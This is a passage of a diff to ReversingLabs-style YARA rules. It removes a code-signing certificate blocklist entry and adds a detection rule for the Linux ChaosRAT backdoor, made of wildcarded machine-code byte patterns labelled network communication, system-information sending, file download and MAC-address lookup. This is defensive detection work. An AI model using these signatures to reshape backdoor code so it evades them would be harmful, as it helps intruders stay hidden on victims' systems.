-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SOFTWARE HUB IT LTD" and ( pe.signatures [ i ] . serial == "00:df:47:9e:14:a7:0c:79:70:a4:de:3d:d3:e4:bb:03:18" or pe.signatures [ i ] . serial == "df:47:9e:14:a7:0c:79:70:a4:de:3d:d3:e4:bb:03:18" ) and 1591660800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $persistence_mechanism ) and ( $crypto_miner ) and ( $downloader ) and ( all of ( $network_communication_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_2924785Fd7990B2D510675176Dae2Bed : INFO FILE
+rule REVERSINGLABS_Linux_Backdoor_Chaosrat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects ChaosRAT backdoor."
 		author = "ReversingLabs"
-		id = "6898e95c-ee31-57a3-b764-99bf9008d0fe"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "efb8c631-79bf-5d18-ae99-0e55ea462278"
+		date = "2025-06-30"
+		modified = "2025-06-30"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4724-L4740"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.ChaosRAT.yara#L1-L270"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e308ca5f24ed5811e947289caf9aa820a16b08ea183c7aa9826f8a726fb5c3cf"
+		logic_hash = "09a11559384f3e01c8ac304d933a8279175c676fba9ec70627f44b76e90090f9"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "ChaosRAT"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$network_communication_v1 = {
+            49 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 83 EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 89 44 24
+            ?? 80 78 ?? ?? 74 ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? E8
+            ?? ?? ?? ?? 0F 1F 40 ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8B 48 ?? 48 89 D8 FF D1 44 0F
+            11 7C 24 ?? B9 ?? ?? ?? ?? 48 89 C7 48 89 DE 31 C0 48 8D 1D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 44 24 ?? 90 48 8B 1D ??
+            ?? ?? ?? 48 8D 05 ?? ?? ?? ?? BF ?? ?? ?? ?? 48 89 FE 48 8D 4C 24 ?? E8 ?? ?? ?? ??
+            48 8B 4C 24 ?? C6 41 ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 0F 1F 44 00 ?? E8 ?? ?? ??
+            ?? 48 8B 44 24 ?? E9 ?? ?? ?? ?? 48 8B 44 24 ?? E8 ?? ?? ?? ?? 48 85 C0 75 ?? 48 8B
+            44 24 ?? C6 40 ?? ?? E9 ?? ?? ?? ?? 48 8B 48 ?? 48 89 D8 FF D1 44 0F 11 7C 24 ?? B9
+            ?? ?? ?? ?? 48 89 C7 48 89 DE 31 C0 48 8D 1D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 44 24 ?? 90 48 8B 1D ?? ?? ?? ?? 48 8D
+            05 ?? ?? ?? ?? BF ?? ?? ?? ?? 48 89 FE 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ??
+            C6 41 ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 66 90 E8 ?? ?? ?? ?? 48 8B 44 24 ?? E9 ??
+            ?? ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24
+        }
+		$send_system_information_v1 = {
+            4C 8D 64 24 ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ??
+            ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 48 ?? 48 8B 11 48 8B 49
+            ?? 48 8B 52 ?? 48 89 C8 FF D2 48 85 DB 0F 85 ?? ?? ?? ?? 48 89 C3 48 8D 05 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 85 FF 0F 85 ?? ?? ?? ?? 48 89 44 24 ?? 48 89
+            5C 24 ?? 48 89 4C 24 ?? 44 0F 11 7C 24 ?? 44 0F 11 7C 24 ?? 48 8B 8C 24 ?? ?? ?? ??
+            48 8B 51 ?? 48 8B 42 ?? 48 8B 5A ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24
+            ?? 48 89 44 24 ?? 48 89 4C 24 ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8D
+            44 24 ?? BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 51 ??
+            48 8B 49 ?? 48 8B 52 ?? 48 89 C7 48 89 DE 4C 8B 44 24 ?? 4C 8B 4C 24 ?? 4C 8B 54 24
+            ?? 48 89 C8 48 8D 1D ?? ?? ?? ?? B9 ?? ?? ?? ?? FF D2 48 85 DB 75 ?? 48 81 78 ?? ??
+            ?? ?? ?? 74 ?? 44 0F 11 7C 24 ?? 48 8B 40 ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48
+            89 4C 24 ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 4C 24 ?? BF ??
+            ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 31
+            C0 31 DB 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 D8 48 89 CB 48 8B AC
+            24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 F8 48 89 F3 48 8B AC 24 ?? ?? ?? ?? 48
+            81 C4 ?? ?? ?? ?? C3 48 89 D8 48 89 CB 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ??
+            C3 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24
+        }
+		$download_file_v1_p1 = {
+            4C 8D 64 24 ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ??
+            ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89
+            8C 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 B4 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48
+            89 5C 24 ?? 48 89 4C 24 ?? 48 89 F8 48 89 F3 E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C
+            24 ?? 44 0F 11 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 51
+            ?? 48 8B 49 ?? 48 89 D0 48 89 CB E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ??
+            ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89
+            94 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 44
+            0F 11 7C 24 ?? 44 0F 11 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89
+            4C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? E8 ?? ?? ?? ?? 48 8D
+            0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ??
+            BB ?? ?? ?? ?? 48 8D 4C 24 ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 8B 4C 24 ??
+            48 8B 49 ?? 48 89 C7 48 89 DE 45 31 C0 45 31 C9 4D 89 CA 48 8B 44 24 ?? 48 8D 1D ??
+            ?? ?? ?? 48 89 CA B9 ?? ?? ?? ?? FF D2 0F 1F 80 ?? ?? ?? ?? 48 85 DB 0F 85 ?? ?? ??
+            ?? 48 81 78 ?? ?? ?? ?? ?? 75 ?? 48 8B 08 48 8B 78 ?? 48 8B 70 ?? 48 8B 84 24 ?? ??
+            ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 C0 74 ?? 31 C9
+        }
+		$download_file_v1_p2 = {
+            48 89 C7 48 89 DE 31 C0 48 89 CB 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 31
+            C0 48 8B 5C 24 ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 31 FF 31 F6 48 8B AC 24 ?? ?? ?? ??
+            48 81 C4 ?? ?? ?? ?? 90 C3 44 0F 11 7C 24 ?? 48 8B 40 ?? E8 ?? ?? ?? ?? 48 8D 0D ??
+            ?? ?? ?? 48 89 4C 24 ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 4C
+            24 ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 31 C9 48 89 C7 48 89 DE 31 C0 48 89 CB
+            48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 31 C0 48 89 DF 48 89 CE 31 DB 48 89
+            D9 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 44 24 ?? 48 89 5C 24 ?? 48
+            89 4C 24 ?? 48 89 7C 24 ?? 48 89 74 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 5C 24
+            ?? 48 8B 4C 24 ?? 48 8B 7C 24 ?? 48 8B 74 24
+        }
+		$network_communication_v2 = {
+            64 48 8B 0C 25 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83 EC ?? 48 89 6C 24 ??
+            48 8D 6C 24 ?? 0F 57 C0 0F 11 44 24 ?? 0F 11 44 24 ?? 48 8B 44 24 ?? 48 8B 08 48 8B
+            51 ?? 48 8B 49 ?? 48 89 14 24 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8D 0D
+            ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 48 8B 10 48 8B 9A ?? ?? ??
+            ?? 48 8B 92 ?? ?? ?? ?? 48 89 1C 24 48 89 54 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48
+            8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 44 24 ?? 48 8D 44 24 ?? 48 89 04 24 48 C7 44
+            24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44
+            24 ?? 48 8B 4C 24 ?? 48 89 4C 24 ?? 48 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44
+            24 ?? 80 78 ?? ?? 75 ?? 80 78 ?? ?? 74 ?? C7 04 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ??
+            48 89 4C 24 ?? 48 89 44 24 ?? 48 8B 54 24 ?? 48 89 54 24 ?? 48 8B 5C 24 ?? 48 89 5C
+            24 ?? E8 ?? ?? ?? ?? 48 8B 44 24
+        }
+		$send_system_information_v2 = {
+            64 48 8B 0C 25 ?? ?? ?? ?? 48 8D 44 24 ?? 48 3B 41 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ??
+            ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48
+            8B 48 ?? 48 8B 11 48 8B 49 ?? 48 8B 52 ?? 48 89 0C 24 FF D2 48 8B 44 24 ?? 48 8B 4C
+            24 ?? 48 83 7C 24 ?? ?? 0F 1F 40 ?? 0F 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 04
+            24 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 48 8B
+            74 24 ?? 48 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 48 89 54 24 ?? 48 89 5C 24 ?? 48 89 74
+            24 ?? 0F 57 C0 0F 11 44 24 ?? 0F 11 84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B
+            08 48 8B 51 ?? 48 8B 49 ?? 48 89 14 24 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ??
+            48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 10
+            48 8B 9A ?? ?? ?? ?? 48 8B 92 ?? ?? ?? ?? 48 89 1C 24 48 89 54 24 ?? E8 ?? ?? ?? ??
+            48 8B 44 24 ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ??
+            48 8D 44 24 ?? 48 89 04 24 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 48 ?? 48 8B 40 ?? 48 8B 49 ?? 48 89 04 24
+            48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8B 44 24 ?? 48 89
+            44 24 ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 48 89 44 24 ?? 90 FF D1 48 8B
+            44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 83 7C 24 ?? ?? 75 ?? 48 81 78 ?? ?? ?? ??
+            ?? 74 ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48
+            81 C4 ?? ?? ?? ?? C3 0F 57 C0 0F 11 84 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81
+            C4 ?? ?? ?? ?? C3 48 89 8C 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 8B AC 24 ?? ??
+            ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 84 24 ?? ?? ?? ?? 48 89 8C 24
+        }
+		$download_file_v2_p1 = {
+            64 48 8B 0C 25 ?? ?? ?? ?? 48 8D 44 24 ?? 48 3B 41 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ??
+            ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48
+            89 04 24 48 8B 8C 24 ?? ?? ?? ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89
+            44 24 ?? 48 8B 4C 24 ?? 48 89 4C 24 ?? 0F 57 C0 0F 11 84 24 ?? ?? ?? ?? 0F 11 84 24
+            ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 5A ?? 48 8B 72 ?? 48 89 1C 24 48 89 74 24
+            ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89
+            84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 48 8B 80 ?? ?? ?? ??
+            48 89 14 24 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8D 0D ?? ?? ?? ?? 48 89
+            8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 04 24 48 C7
+            44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B
+            4C 24 ?? 0F 57 C0 0F 11 44 24 ?? 0F 11 84 24 ?? ?? ?? ?? 48 89 04 24 48 89 4C 24 ??
+            E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 84 24 ?? ??
+            ?? ?? 48 8B 44 24 ?? 48 89 04 24 48 8B 54 24 ?? 48 89 54 24 ?? E8 ?? ?? ?? ?? 48 8B
+            44 24 ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D
+            05 ?? ?? ?? ?? 48 89 04 24 48 C7 44 24 ?? ?? ?? ?? ?? 48 8D 44 24 ?? 48 89 44 24 ??
+            48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ??
+            48 8B 4C 24 ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 52 ?? 48 8B 9C 24 ?? ?? ?? ?? 48 89 1C
+            24 48 8D 1D ?? ?? ?? ?? 48 89 5C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 89 44 24 ?? 48
+            89 4C 24 ?? 0F 57 C0 0F 11 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? FF D2 48 8B 44 24
+        }
+		$download_file_v2_p2 = {
+            48 8B 4C 24 ?? 48 8B 54 24 ?? 48 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 48 81 78 ?? ?? ??
+            ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 08 48 8B 50 ?? 48 8B 40 ?? 48 8B 9C 24 ?? ?? ?? ?? 48
+            89 1C 24 48 8B 9C 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 4C 24 ?? 48 89 54 24 ?? 48 89
+            44 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 83
+            7C 24 ?? ?? 74 ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 0F 57 C0 0F 11 84 24 ?? ?? ??
+            ?? 48 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4
+            ?? ?? ?? ?? C3 48 C7 04 24 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 44 24 ??
+            48 89 44 24 ?? 0F 1F 00 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ??
+            48 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 0F 57 C0 0F
+            11 84 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 0F 57 C0 0F 11
+            44 24 ?? 48 8B 40 ?? 48 89 04 24 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8D 0D ?? ?? ?? ??
+            48 89 4C 24 ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 04 24 48 C7 44 24 ?? ?? ??
+            ?? ?? 48 8D 44 24 ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ??
+            ?? 0F 57 C0 0F 11 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ??
+            48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
+            0F 57 C0 0F 11 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48
+            8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3
+        }
+		$network_communication_v3 = {
+            49 3B 66 ?? 76 ?? 48 83 EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 4D 8B 66 ?? 0F 1F 84 00
+            ?? ?? ?? ?? 4D 85 E4 0F 85 ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 7C 24 ?? 4C 89 84 24 ??
+            ?? ?? ?? 48 89 44 24 ?? 48 85 C0 74 ?? 48 8B 10 4C 8B 60 ?? 48 89 D0 4D 89 D3 4D 89
+            CA 4D 89 C1 49 89 F0 48 89 FE 48 89 CF 48 89 D9 4C 89 E3 E8 ?? ?? ?? ?? 48 8B 6C 24
+            ?? 48 83 C4 ?? C3 E8 ?? ?? ?? ?? 90 48 89 44 24 ?? 48 89 5C 24 ?? 48 89 4C 24 ?? 48
+            89 7C 24 ?? 48 89 74 24 ?? 4C 89 44 24 ?? 4C 89 4C 24 ?? 4C 89 54 24 ?? E8 ?? ?? ??
+            ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 8B 4C 24 ?? 48 8B 7C 24 ?? 48 8B 74 24 ?? 4C 8B
+            44 24 ?? 4C 8B 4C 24 ?? 4C 8B 54 24 ?? E9 ?? ?? ?? ?? 4C 8D 6C 24 ?? 0F 1F 44 00 ??
+            4D 39 2C 24 0F 85 ?? ?? ?? ?? 49 89 24 24
+        }
+		$get_mac_address_v3 = {
+            4C 8D 64 24 ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ??
+            ?? ?? 48 8D AC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 FF 75 ?? 48 85 DB 7E ?? 48 89 5C
+            24 ?? 31 C9 31 D2 31 F6 31 FF EB ?? 31 C0 31 C9 EB ?? 31 C0 31 DB 48 89 F9 48 89 F7
+            48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 85 C0 75 ?? 31 C0 31 DB 31 C9 48
+            89 C7 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 01 48 8B 59 ?? 31 C9 31
+            FF 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 4C 8B 54 24 ?? 49 8D 42 ?? 4C 89
+            C1 48 89 D3 48 89 FA 48 89 DF 48 89 4C 24 ?? 48 89 44 24 ?? 48 89 54 24 ?? 48 89 7C
+            24 ?? 48 89 74 24 ?? 0F 10 00 0F 11 84 24 ?? ?? ?? ?? 0F 10 40 ?? 0F 11 84 24 ?? ??
+            ?? ?? 0F 10 40 ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 40 ?? 0F 11 84 24 ?? ?? ?? ?? 4C 8B
+            84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 4C 8B 8C 24 ?? ?? ?? ?? 4C 89 C0 4C 89 C9
+            E8 ?? ?? ?? ?? 0F 1F 00 48 85 DB 74 ?? 48 8B 4C 24 ?? 48 8D 71 ?? 48 8B 7C 24 ?? 48
+            39 F7 72 ?? 48 8B 54 24 ?? EB ?? 48 89 5C 24 ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ??
+            48 8B 5C 24 ?? E8 ?? ?? ?? ?? 48 8D 73 ?? 48 8B 5C 24 ?? 48 89 C2 48 89 CF 48 8B 44
+            24 ?? 48 8B 4C 24 ?? 48 C1 E1 ?? 48 89 5C 0A ?? 4C 8D 04 0A 83 3D ?? ?? ?? ?? ?? 75
+            ?? 48 89 04 0A EB ?? 48 89 F9 4C 89 C7 E8 ?? ?? ?? ?? 48 89 CF EB ?? 48 8B 74 24 ??
+            48 8B 54 24 ?? 48 8B 7C 24 ?? 4C 8B 44 24 ?? 49 FF C0 4C 8B 4C 24 ?? 0F 1F 44 00 ??
+            4D 39 C1 0F 8F ?? ?? ?? ?? 48 89 F0 48 89 D1 E9
+        }
+		$download_file_v3_p1 = {
+            4C 8D 64 24 ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ??
+            ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89
+            8C 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 BC 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 4C 24
+            ?? 48 89 B4 24 ?? ?? ?? ?? 48 89 F8 48 89 F3 E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C
+            24 ?? 48 8D 8C 24 ?? ?? ?? ?? 44 0F 11 39 48 8D 94 24 ?? ?? ?? ?? 44 0F 11 3A 48 8B
+            54 24 ?? 48 8B 72 ?? 48 8B 7A ?? 48 89 F0 48 89 FB 0F 1F 00 E8 ?? ?? ?? ?? 48 8D 0D
+            ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B 82
+            ?? ?? ?? ?? 48 8B 9A ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ??
+            ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 0F
+            1F 44 00 ?? E8 ?? ?? ?? ?? 48 8D 4C 24 ?? 44 0F 11 39 48 8D 94 24 ?? ?? ?? ?? 44 0F
+            11 3A E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48
+            8B 44 24 ?? 48 8B 5C 24 ?? 0F 1F 00 E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24
+            ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 4C 24
+            ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 89 C7 48 89
+        }
+		$download_file_v3_p2 = {
+            DE 45 31 C0 45 31 C9 4D 89 CA 48 8B 44 24 ?? 48 8D 1D ?? ?? ?? ?? 48 89 CA B9 ?? ??
+            ?? ?? FF D2 48 85 DB 0F 85 ?? ?? ?? ?? 48 81 78 ?? ?? ?? ?? ?? 75 ?? 48 8B 08 48 8B
+            78 ?? 48 8B 70 ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ??
+            0F 1F 40 ?? E8 ?? ?? ?? ?? 48 85 C0 74 ?? 31 C9 48 89 C7 48 89 DE 31 C0 48 89 CB 48
+            8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 31 C0 48 8B 5C 24 ?? 48 8B 4C 24 ?? E8
+            ?? ?? ?? ?? 31 FF 31 F6 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 44 0F 11 7C
+            24 ?? 48 8B 40 ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 44 24 ??
+            48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 4C 24 ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ??
+            ?? ?? 31 C9 48 89 C7 48 89 DE 31 C0 48 89 CB 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ??
+            ?? ?? C3 31 C0 48 89 DF 48 89 CE 31 DB 48 89 D9 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ??
+            ?? ?? ?? C3 48 89 44 24 ?? 48 89 5C 24 ?? 48 89 4C 24 ?? 48 89 7C 24 ?? 48 89 74 24
+            ?? 0F 1F 00 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 8B 4C 24 ?? 48 8B 7C 24
+            ?? 48 8B 74 24
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Neoopt LLC" and pe.signatures [ i ] . serial == "29:24:78:5f:d7:99:0b:2d:51:06:75:17:6d:ae:2b:ed" and 1595000258 <= pe.signatures [ i ] . not_after )
